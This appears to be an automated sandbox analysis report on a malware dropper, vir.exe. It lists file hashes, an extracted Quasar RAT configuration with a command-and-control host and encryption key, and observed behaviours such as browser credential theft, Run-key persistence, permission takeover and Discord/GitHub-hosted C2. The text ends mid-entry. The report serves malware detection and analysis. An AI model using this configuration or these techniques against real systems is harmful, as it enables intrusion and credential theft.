Resubmissions
26-12-2024 15:01
241226-sec6vayjgx 1027-09-2024 10:28
240927-mh3m1sxgrm 1018-08-2024 19:49
240818-yjmtqsthkm 1018-08-2024 14:30
240818-rvdxmsxgjg 1015-08-2024 23:29
240815-3g3jmawdnq 1015-08-2024 23:15
240815-28syts1brg 1015-08-2024 22:57
240815-2w8thszepa 10Analysis
-
max time kernel
152s -
max time network
159s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-08-2024 23:29
Behavioral task
behavioral1
Sample
vir.exe
Resource
win11-20240802-en
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/files/0x000100000002aaeb-204.dat family_umbral behavioral1/files/0x000100000002abbe-3971.dat family_umbral behavioral1/memory/5452-3981-0x000001B8411C0000-0x000001B841200000-memory.dmp family_umbral -
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x000100000002aae7-200.dat family_quasar behavioral1/memory/1604-3473-0x0000000000930000-0x0000000000C54000-memory.dmp family_quasar -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 33 3708 mshta.exe 80 5964 rundll32.exe -
pid Process 3004 powershell.exe 1664 powershell.exe 1700 powershell.exe 6452 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 6344 netsh.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 7012 icacls.exe 4628 takeown.exe 7004 icacls.exe 6796 takeown.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/3908-249-0x0000000006090000-0x00000000065E0000-memory.dmp net_reactor behavioral1/memory/3908-250-0x0000000005B40000-0x000000000608E000-memory.dmp net_reactor behavioral1/memory/3908-251-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-260-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-256-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-262-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-270-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-266-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-268-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-264-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-276-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-281-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-289-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-308-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-306-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-312-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-311-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-302-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-297-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-304-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-300-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-295-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-293-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-291-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-316-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-314-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-287-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-285-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-283-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-278-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-274-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-272-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-258-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-254-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor behavioral1/memory/3908-252-0x0000000005B40000-0x0000000006089000-memory.dmp net_reactor -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe -
Executes dropped EXE 29 IoCs
pid Process 3288 ProgressBarSplash.exe 3908 Rover.exe 6124 Google.exe 5124 regmess.exe 5900 1.exe 1960 3.exe 2196 WinaeroTweaker-1.40.0.0-setup.exe 1916 WinaeroTweaker-1.40.0.0-setup.tmp 1604 scary.exe 5956 the.exe 5612 wimloader.dll 4696 Romilyaa.exe 1624 Romilyaa.exe 2104 ac3.exe 1580 Romilyaa.exe 6468 Romilyaa.exe 3276 freebobux.exe 5552 SolaraBootstraper.exe 7032 SolaraBootstrapper.exe 7108 wim.dll 5452 Umbral.exe 6256 !FIXInj.exe 6264 CLWCP.exe 2308 Romilyaa.exe 6204 Romilyaa.exe 1800 Romilyaa.exe 2776 Romilyaa.exe 6844 Romilyaa.exe 2932 Romilyaa.exe -
Loads dropped DLL 4 IoCs
pid Process 5900 1.exe 5900 1.exe 5900 1.exe 1916 WinaeroTweaker-1.40.0.0-setup.tmp -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 6796 takeown.exe 7012 icacls.exe 4628 takeown.exe 7004 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000100000002aad8-184.dat upx behavioral1/files/0x000100000002aaf8-216.dat upx behavioral1/memory/1960-3350-0x0000000000290000-0x00000000018B7000-memory.dmp upx behavioral1/memory/1960-3438-0x0000000000290000-0x00000000018B7000-memory.dmp upx behavioral1/memory/3276-3946-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral1/memory/3276-4042-0x0000000000400000-0x000000000083E000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 36 raw.githubusercontent.com 36 discord.com 71 raw.githubusercontent.com 94 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 37 ip-api.com -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000100000002aad7-122.dat autoit_exe behavioral1/files/0x000100000002aadc-189.dat autoit_exe behavioral1/files/0x000100000002aad1-179.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2308 tasklist.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" CLWCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" reg.exe -
Drops file in Program Files directory 20 IoCs
description ioc Process File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-SJLQC.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-M8IHG.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-4ODJ9.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-NK2R8.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-O5I48.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-3TI9D.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-22LT6.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-427MQ.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-75JET.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-ROTSH.tmp WinaeroTweaker-1.40.0.0-setup.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 3516 1960 WerFault.exe 145 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SolaraBootstraper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinaeroTweaker-1.40.0.0-setup.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vir.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language freebobux.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SolaraBootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CLWCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language !FIXInj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinaeroTweaker-1.40.0.0-setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wim.dll Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ProgressBarSplash.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wimloader.dll Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regmess.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 18 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7136 PING.EXE 2344 PING.EXE 6284 PING.EXE 2708 PING.EXE 6760 PING.EXE 1720 PING.EXE 7104 PING.EXE 5192 PING.EXE 4720 PING.EXE 2124 PING.EXE 1452 PING.EXE 6868 PING.EXE 7148 cmd.exe 2972 PING.EXE 2992 PING.EXE 6212 PING.EXE 248 PING.EXE 1168 PING.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000100000002aaf6-214.dat nsis_installer_1 behavioral1/files/0x000100000002aaf6-214.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 768 timeout.exe 5716 timeout.exe 3024 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4636 wmic.exe -
Enumerates system info in registry 2 TTPs 13 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 668 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 5868 taskkill.exe 5388 taskkill.exe 1668 taskkill.exe 2504 taskkill.exe 4828 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39 reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5 reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14 reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\23 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\36 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\12\IEPropFontName = "Raavi" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\5\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEFixedFontName = "Mongolian Baiti" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEPropFontName = "Mongolian Baiti" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4 reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEFixedFontName = "Estrangelo Edessa" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\17\IEFixedFontName = "Tunga" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\7\IEFixedFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\29\IEFixedFontName = "Gadugi" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\8\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\12\IEFixedFontName = "Raavi" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = 